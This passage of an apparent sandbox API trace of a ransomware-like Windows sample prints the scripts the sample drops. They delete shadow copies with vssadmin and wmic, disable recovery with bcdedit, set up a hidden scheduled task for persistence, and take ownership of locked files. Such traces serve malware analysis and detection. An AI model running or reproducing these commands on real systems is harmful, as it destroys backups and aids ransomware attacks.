\"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\MuA3C6WI.vbs\"\r\nSCHTASKS /Delete /TN DSHCA /F\r\ndel /f /q %0\r\n", cchWideChar=272, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 272 [0195.931] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="vssadmin Delete Shadows /All /Quiet\r\nwmic SHADOWCOPY DELETE\r\nbcdedit /set {default} recoveryenabled No\r\nbcdedit /set {default} bootstatuspolicy ignoreallfailures\r\ndel /f /q \"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\MuA3C6WI.vbs\"\r\nSCHTASKS /Delete /TN DSHCA /F\r\ndel /f /q %0\r\n", cchWideChar=272, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 272 [0195.931] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="vssadmin Delete Shadows /All /Quiet\r\nwmic SHADOWCOPY DELETE\r\nbcdedit /set {default} recoveryenabled No\r\nbcdedit /set {default} bootstatuspolicy ignoreallfailures\r\ndel /f /q \"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\MuA3C6WI.vbs\"\r\nSCHTASKS /Delete /TN DSHCA /F\r\ndel /f /q %0\r\n", cchWideChar=272, lpMultiByteStr=0x1f3acf8, cbMultiByte=272, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vssadmin Delete Shadows /All /Quiet\r\nwmic SHADOWCOPY DELETE\r\nbcdedit /set {default} recoveryenabled No\r\nbcdedit /set {default} bootstatuspolicy ignoreallfailures\r\ndel /f /q \"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\MuA3C6WI.vbs\"\r\nSCHTASKS /Delete /TN DSHCA /F\r\ndel /f /q %0\r\n", lpUsedDefaultChar=0x0) returned 272 [0195.931] WriteFile (in: hFile=0x27c, lpBuffer=0x1f3acf8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x19fab0, lpOverlapped=0x0 | out: lpBuffer=0x1f3acf8*, lpNumberOfBytesWritten=0x19fab0*=0x110, lpOverlapped=0x0) returned 1 [0195.932] CloseHandle (hObject=0x27c) returned 1 [0195.932] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\cKJ5Qstc.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\ckj5qstc.bat")) returned 0x20 [0195.932] GetCurrentThreadId () returned 0x360 [0195.932] GetCurrentThreadId () returned 0x360 [0195.932] GetCurrentThreadId () returned 0x360 [0195.932] FindResourceW (hModule=0x400000, lpName="RB", lpType=0xa) returned 0x4f54c0 [0195.932] LoadResource (hModule=0x400000, hResInfo=0x4f54c0) returned 0x526b68 [0195.932] SizeofResource (hModule=0x400000, hResInfo=0x4f54c0) returned 0xdd [0195.932] LockResource (hResData=0x526b68) returned 0x526b68 [0195.932] FreeResource (hResData=0x526b68) returned 0 [0195.932] FindResourceW (hModule=0x400000, lpName="KN", lpType=0xa) returned 0x4f5450 [0195.932] LoadResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x525e94 [0195.932] SizeofResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x26 [0195.932] LockResource (hResData=0x525e94) returned 0x525e94 [0195.933] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fe5388, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0195.933] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fe5388, cbMultiByte=38, lpWideCharStr=0x1fde92c, cchWideChar=38 | out: lpWideCharStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N\r\n42\r\n") returned 38 [0195.933] FreeResource (hResData=0x525e94) returned 0 [0195.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0195.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N", cchWideChar=32, lpMultiByteStr=0x1fe538c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N", lpUsedDefaultChar=0x0) returned 32 [0195.933] GetCurrentThreadId () returned 0x360 [0195.933] GetCurrentThreadId () returned 0x360 [0195.933] GetCurrentThreadId () returned 0x360 [0195.933] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x2433f38, cbMultiByte=221, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 221 [0195.933] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x2433f38, cbMultiByte=221, lpWideCharStr=0x244169c, cchWideChar=221 | out: lpWideCharStr="Option Explicit\r\ndim W\r\nSet W = CreateObject(\"Wscript.Shell\")\r\nW.Run \"cmd.exe /C schtasks /Create /tn DSHCA /tr \"\"[BP]\"\" /sc minute /mo 5 /RL HIGHEST /F\", 0, True\r\nW.Run \"cmd.exe /C schtasks /Run /I /tn DSHCA\", 0, False\r\n") returned 221 [0195.933] CharUpperBuffW (in: lpsz="Option Explicit\r\ndim W\r\nSet W = CreateObject(\"Wscript.Shell\")\r\nW.Run \"cmd.exe /C schtasks /Create /tn DSHCA /tr \"\"[BP]\"\" /sc minute /mo 5 /RL HIGHEST /F\", 0, True\r\nW.Run \"cmd.exe /C schtasks /Run /I /tn DSHCA\", 0, False\r\n", cchLength=0xdd | out: lpsz="OPTION EXPLICIT\r\nDIM W\r\nSET W = CREATEOBJECT(\"WSCRIPT.SHELL\")\r\nW.RUN \"CMD.EXE /C SCHTASKS /CREATE /TN DSHCA /TR \"\"[BP]\"\" /SC MINUTE /MO 5 /RL HIGHEST /F\", 0, TRUE\r\nW.RUN \"CMD.EXE /C SCHTASKS /RUN /I /TN DSHCA\", 0, FALSE\r\n") returned 0xdd [0195.933] CharUpperBuffW (in: lpsz="[BP]", cchLength=0x4 | out: lpsz="[BP]") returned 0x4 [0195.933] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\MuA3C6WI.vbs" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mua3c6wi.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0195.933] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Option Explicit\r\ndim W\r\nSet W = CreateObject(\"Wscript.Shell\")\r\nW.Run \"cmd.exe /C schtasks /Create /tn DSHCA /tr \"\"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\cKJ5Qstc.bat\"\" /sc minute /mo 5 /RL HIGHEST /F\", 0, True\r\nW.Run \"cmd.exe /C schtasks /Run /I /tn DSHCA\", 0, False\r\n", cchWideChar=267, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 267 [0195.933] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Option Explicit\r\ndim W\r\nSet W = CreateObject(\"Wscript.Shell\")\r\nW.Run \"cmd.exe /C schtasks /Create /tn DSHCA /tr \"\"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\cKJ5Qstc.bat\"\" /sc minute /mo 5 /RL HIGHEST /F\", 0, True\r\nW.Run \"cmd.exe /C schtasks /Run /I /tn DSHCA\", 0, False\r\n", cchWideChar=267, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 267 [0195.933] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Option Explicit\r\ndim W\r\nSet W = CreateObject(\"Wscript.Shell\")\r\nW.Run \"cmd.exe /C schtasks /Create /tn DSHCA /tr \"\"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\cKJ5Qstc.bat\"\" /sc minute /mo 5 /RL HIGHEST /F\", 0, True\r\nW.Run \"cmd.exe /C schtasks /Run /I /tn DSHCA\", 0, False\r\n", cchWideChar=267, lpMultiByteStr=0x1f3acf8, cbMultiByte=267, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Option Explicit\r\ndim W\r\nSet W = CreateObject(\"Wscript.Shell\")\r\nW.Run \"cmd.exe /C schtasks /Create /tn DSHCA /tr \"\"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\cKJ5Qstc.bat\"\" /sc minute /mo 5 /RL HIGHEST /F\", 0, True\r\nW.Run \"cmd.exe /C schtasks /Run /I /tn DSHCA\", 0, False\r\n %0\r\n", lpUsedDefaultChar=0x0) returned 267 [0195.933] WriteFile (in: hFile=0x27c, lpBuffer=0x1f3acf8*, nNumberOfBytesToWrite=0x10b, lpNumberOfBytesWritten=0x19fab0, lpOverlapped=0x0 | out: lpBuffer=0x1f3acf8*, lpNumberOfBytesWritten=0x19fab0*=0x10b, lpOverlapped=0x0) returned 1 [0195.934] CloseHandle (hObject=0x27c) returned 1 [0195.934] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\MuA3C6WI.vbs" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mua3c6wi.vbs")) returned 0x20 [0195.934] GetCurrentThreadId () returned 0x360 [0195.934] GetCurrentThreadId () returned 0x360 [0195.934] GetCurrentThreadId () returned 0x360 [0195.934] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1f9cf24, csidl=37, fCreate=0 | out: pszPath="C:\\Windows\\system32") returned 1 [0195.934] CharUpperBuffW (in: lpsz="/C wscript //B //Nologo \"[DSP]\"", cchLength=0x1f | out: lpsz="/C WSCRIPT //B //NOLOGO \"[DSP]\"") returned 0x1f [0195.934] CharUpperBuffW (in: lpsz="[DSP]", cchLength=0x5 | out: lpsz="[DSP]") returned 0x5 [0195.934] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C wscript //B //Nologo \"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\MuA3C6WI.vbs\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19fb60*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19fb50 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C wscript //B //Nologo \"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\MuA3C6WI.vbs\"", lpProcessInformation=0x19fb50*(hProcess=0x298, hThread=0x27c, dwProcessId=0xfa4, dwThreadId=0xfa8)) returned 1 [0195.943] CloseHandle (hObject=0x298) returned 1 [0195.943] CloseHandle (hObject=0x27c) returned 1 [0195.943] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19fa0c, nSize=0x105 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\current_dirnwovkcyl.exe")) returned 0x35 [0195.943] GetTickCount () returned 0x3b6af [0195.943] QueryPerformanceCounter (in: lpPerformanceCount=0x19fb4c | out: lpPerformanceCount=0x19fb4c*=24340610231) returned 1 [0195.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb28, cbMultiByte=1, lpWideCharStr=0x19eb10, cchWideChar=2047 | out: lpWideCharStr="\x76\xb500\xfb48\x19\x9bc\xb500\x6808\x2c\x02\x200\x5f5c\x2a\x06\x600\xfec4\xffff\x160b\x1508\x6020\x2a\x1c0") returned 1 [0195.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb28, cbMultiByte=1, lpWideCharStr=0x19eb10, cchWideChar=2047 | out: lpWideCharStr="\x49\xb500\xfb48\x19\x9bc\xb500\x6808\x2c\x02\x200\x5f5c\x2a\x06\x600\xfec4\xffff\x160b\x1508\x6020\x2a\x1c0") returned 1 [0195.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb28, cbMultiByte=1, lpWideCharStr=0x19eb10, cchWideChar=2047 | out: lpWideCharStr="\x44\xb500\xfb48\x19\x9bc\xb500\x6808\x2c\x02\x200\x5f5c\x2a\x06\x600\xfec4\xffff\x160b\x1508\x6020\x2a\x1c0") returned 1 [0195.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb28, cbMultiByte=1, lpWideCharStr=0x19eb10, cchWideChar=2047 | out: lpWideCharStr="\x68\xb500\xfb48\x19\x9bc\xb500\x6808\x2c\x02\x200\x5f5c\x2a\x06\x600\xfec4\xffff\x160b\x1508\x6020\x2a\x1c0") returned 1 [0195.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb28, cbMultiByte=1, lpWideCharStr=0x19eb10, cchWideChar=2047 | out: lpWideCharStr="\x53\xb500\xfb48\x19\x9bc\xb500\x6808\x2c\x02\x200\x5f5c\x2a\x06\x600\xfec4\xffff\x160b\x1508\x6020\x2a\x1c0") returned 1 [0195.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb28, cbMultiByte=1, lpWideCharStr=0x19eb10, cchWideChar=2047 | out: lpWideCharStr="\x33\xb500\xfb48\x19\x9bc\xb500\x6808\x2c\x02\x200\x5f5c\x2a\x06\x600\xfec4\xffff\x160b\x1508\x6020\x2a\x1c0") returned 1 [0195.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb28, cbMultiByte=1, lpWideCharStr=0x19eb10, cchWideChar=2047 | out: lpWideCharStr="\x6d\xb500\xfb48\x19\x9bc\xb500\x6808\x2c\x02\x200\x5f5c\x2a\x06\x600\xfec4\xffff\x160b\x1508\x6020\x2a\x1c0") returned 1 [0195.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb28, cbMultiByte=1, lpWideCharStr=0x19eb10, cchWideChar=2047 | out: lpWideCharStr="\x64\xb500\xfb48\x19\x9bc\xb500\x6808\x2c\x02\x200\x5f5c\x2a\x06\x600\xfec4\xffff\x160b\x1508\x6020\x2a\x1c0") returned 1 [0195.944] FindResourceW (hModule=0x400000, lpName="HN", lpType=0xa) returned 0x4f5440 [0195.944] LoadResource (hModule=0x400000, hResInfo=0x4f5440) returned 0x4f8a0c [0195.944] SizeofResource (hModule=0x400000, hResInfo=0x4f5440) returned 0x2d488 [0195.944] LockResource (hResData=0x4f8a0c) returned 0x4f8a0c [0195.950] FreeResource (hResData=0x4f8a0c) returned 0 [0195.950] FindResourceW (hModule=0x400000, lpName="KN", lpType=0xa) returned 0x4f5450 [0195.950] LoadResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x525e94 [0195.950] SizeofResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x26 [0195.950] LockResource (hResData=0x525e94) returned 0x525e94 [0195.950] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fe5388, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0195.950] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fe5388, cbMultiByte=38, lpWideCharStr=0x1fde32c, cchWideChar=38 | out: lpWideCharStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N\r\n42\r\n") returned 38 [0195.950] FreeResource (hResData=0x525e94) returned 0 [0195.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0195.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N", cchWideChar=32, lpMultiByteStr=0x1fe538c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N", lpUsedDefaultChar=0x0) returned 32 [0195.950] GetCurrentThreadId () returned 0x360 [0195.950] GetCurrentThreadId () returned 0x360 [0195.951] GetCurrentThreadId () returned 0x360 [0195.953] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0196.011] WriteFile (in: hFile=0x27c, lpBuffer=0x6ec860*, nNumberOfBytesToWrite=0x2d488, lpNumberOfBytesWritten=0x19fb38, lpOverlapped=0x0 | out: lpBuffer=0x6ec860*, lpNumberOfBytesWritten=0x19fb38*=0x2d488, lpOverlapped=0x0) returned 1 [0196.013] CloseHandle (hObject=0x27c) returned 1 [0196.106] GetTickCount () returned 0x3b75a [0196.106] QueryPerformanceCounter (in: lpPerformanceCount=0x19fb4c | out: lpPerformanceCount=0x19fb4c*=24356824471) returned 1 [0196.106] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb28, cbMultiByte=1, lpWideCharStr=0x19eb10, cchWideChar=2047 | out: lpWideCharStr="\x76\xb500\xfb48\x19\x9bc\xb500\x6808\x2c\x02\x200\x5f5c\x2a\x06\x600\xfec4\xffff\x160b\x1508\x6020\x2a\x1c0") returned 1 [0196.106] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb28, cbMultiByte=1, lpWideCharStr=0x19eb10, cchWideChar=2047 | out: lpWideCharStr="\x52\xb500\xfb48\x19\x9bc\xb500\x6808\x2c\x02\x200\x5f5c\x2a\x06\x600\xfec4\xffff\x160b\x1508\x6020\x2a\x1c0") returned 1 [0196.106] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb28, cbMultiByte=1, lpWideCharStr=0x19eb10, cchWideChar=2047 | out: lpWideCharStr="\x6e\xb500\xfb48\x19\x9bc\xb500\x6808\x2c\x02\x200\x5f5c\x2a\x06\x600\xfec4\xffff\x160b\x1508\x6020\x2a\x1c0") returned 1 [0196.106] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb28, cbMultiByte=1, lpWideCharStr=0x19eb10, cchWideChar=2047 | out: lpWideCharStr="\x71\xb500\xfb48\x19\x9bc\xb500\x6808\x2c\x02\x200\x5f5c\x2a\x06\x600\xfec4\xffff\x160b\x1508\x6020\x2a\x1c0") returned 1 [0196.106] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb28, cbMultiByte=1, lpWideCharStr=0x19eb10, cchWideChar=2047 | out: lpWideCharStr="\x4e\xb500\xfb48\x19\x9bc\xb500\x6808\x2c\x02\x200\x5f5c\x2a\x06\x600\xfec4\xffff\x160b\x1508\x6020\x2a\x1c0") returned 1 [0196.106] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb28, cbMultiByte=1, lpWideCharStr=0x19eb10, cchWideChar=2047 | out: lpWideCharStr="\x4d\xb500\xfb48\x19\x9bc\xb500\x6808\x2c\x02\x200\x5f5c\x2a\x06\x600\xfec4\xffff\x160b\x1508\x6020\x2a\x1c0") returned 1 [0196.106] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb28, cbMultiByte=1, lpWideCharStr=0x19eb10, cchWideChar=2047 | out: lpWideCharStr="\x42\xb500\xfb48\x19\x9bc\xb500\x6808\x2c\x02\x200\x5f5c\x2a\x06\x600\xfec4\xffff\x160b\x1508\x6020\x2a\x1c0") returned 1 [0196.106] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb28, cbMultiByte=1, lpWideCharStr=0x19eb10, cchWideChar=2047 | out: lpWideCharStr="\x57\xb500\xfb48\x19\x9bc\xb500\x6808\x2c\x02\x200\x5f5c\x2a\x06\x600\xfec4\xffff\x160b\x1508\x6020\x2a\x1c0") returned 1 [0196.106] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1fcfb1c, cbMultiByte=30, lpWideCharStr=0x19eaac, cchWideChar=2047 | out: lpWideCharStr="cacls %1 /E /G %USERNAME%:F /C蚙@רּ\x19蠆@רּ\x19\x01") returned 30 [0196.106] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1fb306c, cbMultiByte=13, lpWideCharStr=0x19eaac, cchWideChar=2047 | out: lpWideCharStr="takeown /F %1G %USERNAME%:F /C蚙@רּ\x19蠆@רּ\x19\x01") returned 13 [0196.106] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1fb306c, cbMultiByte=14, lpWideCharStr=0x19eaac, cchWideChar=2047 | out: lpWideCharStr="set FN=\"%~nx1\" %USERNAME%:F /C蚙@רּ\x19蠆@רּ\x19\x01") returned 14 [0196.106] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1fb306c, cbMultiByte=13, lpWideCharStr=0x19eaac, cchWideChar=2047 | out: lpWideCharStr="cd /d \"%~dp0\"\" %USERNAME%:F /C蚙@רּ\x19蠆@רּ\x19\x01") returned 13 [0196.106] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1f12a24, cbMultiByte=130, lpWideCharStr=0x19eaac, cchWideChar=2047 | out: lpWideCharStr="FOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`[HN] -accepteula %FN% -nobanner`) DO ([HN] -accepteula -c %%J -y -p %%I -nobanner)") returned 130 [0196.106] CharUpperBuffW (in: lpsz="cacls %1 /E /G %USERNAME%:F /C\r\ntakeown /F %1\r\nset FN=\"%~nx1\"\r\ncd /d \"%~dp0\"\r\nFOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`[HN] -accepteula %FN% -nobanner`) DO ([HN] -accepteula -c %%J -y -p %%I -nobanner)\r\n", cchLength=0xd2 | out: lpsz="CACLS %1 /E /G %USERNAME%:F /C\r\nTAKEOWN /F %1\r\nSET FN=\"%~NX1\"\r\nCD /D \"%~DP0\"\r\nFOR /F \"USEBACKQ TOKENS=3,6 DELIMS=: \" %%I IN (`[HN] -ACCEPTEULA %FN% -NOBANNER`) DO ([HN] -ACCEPTEULA -C %%J -Y -P %%I -NOBANNER)\r\n") returned 0xd2 [0196.106] CharUpperBuffW (in: lpsz="[HN]", cchLength=0x4 | out: lpsz="[HN]") returned 0x4 [0196.106] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a4 [0196.129] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="cacls %1 /E /G %USERNAME%:F /C\r\ntakeown /F %1\r\nset FN=\"%~nx1\"\r\ncd /d \"%~dp0\"\r\nFOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`vIDhS3md.exe -accepteula %FN% -nobanner`) DO (vIDhS3md.exe -accepteula -c %%J -y -p %%I -nobanner)\r\n", cchWideChar=226, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 226 [0196.129] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="cacls %1 /E /G %USERNAME%:F /C\r\ntakeown /F %1\r\nset FN=\"%~nx1\"\r\ncd /d \"%~dp0\"\r\nFOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`vIDhS3md.exe -accepteula %FN% -nobanner`) DO (vIDhS3md.exe -accepteula -c %%J -y -p %%I -nobanner)\r\n", cchWideChar=226, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 226 [0196.129] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="cacls %1 /E /G %USERNAME%:F /C\r\ntakeown /F %1\r\nset FN=\"%~nx1\"\r\ncd /d \"%~dp0\"\r\nFOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`vIDhS3md.exe -accepteula %FN% -nobanner`) DO (vIDhS3md.exe -accepteula -c %%J -y -p %%I -nobanner)\r\n", cchWideChar=226, lpMultiByteStr=0x2433f38, cbMultiByte=226, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cacls %1 /E /G %USERNAME%:F /C\r\ntakeown /F %1\r\nset FN=\"%~nx1\"\r\ncd /d \"%~dp0\"\r\nFOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`vIDhS3md.exe -accepteula %FN% -nobanner`) DO (vIDhS3md.exe -accepteula -c %%J -y -p %%I -nobanner)\r\n", lpUsedDefaultChar=0x0) returned 226 [0196.129] WriteFile (in: hFile=0x2a4, lpBuffer=0x2433f38*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x19fae8, lpOverlapped=0x0 | out: lpBuffer=0x2433f38*, lpNumberOfBytesWritten=0x19fae8*=0xe2, lpOverlapped=0x0) returned 1 [0196.129] CloseHandle (hObject=0x2a4) returned 1 [0196.132] GetCurrentThreadId () returned 0x360 [0196.132] GetCurrentThreadId () returned 0x360 [0196.132] GetCurrentThreadId () returned 0x360 [0196.132] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x20 [0196.132] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat")) returned 0x20 [0196.132] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19fa0c, nSize=0x105 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\current_dirnwovkcyl.exe")) returned 0x35 [0196.132] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1fc0df0, dwCreationFlags=0x4, lpThreadId=0x1f3d2b4 | out: lpThreadId=0x1f3d2b4*=0xfcc) returned 0x2a4 [0196.133] SetThreadPriority (hThread=0x2a4, nPriority=0) returned 1 [0196.133] ResumeThread (hThread=0x2a4) returned 0x1 [0196.133] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19f768, nSize=0x105 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\current_dirnwovkcyl.exe")) returned 0x35 [0196.133] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\*.tts", lpFindFileData=0x19f9c0 | out: lpFindFileData=0x19f9c0) returned 0xffffffff [0196.133] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0196.133] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1fba72c, cbMultiByte=2, lpWideCharStr=0x19eb48, cchWideChar=2047 | out: 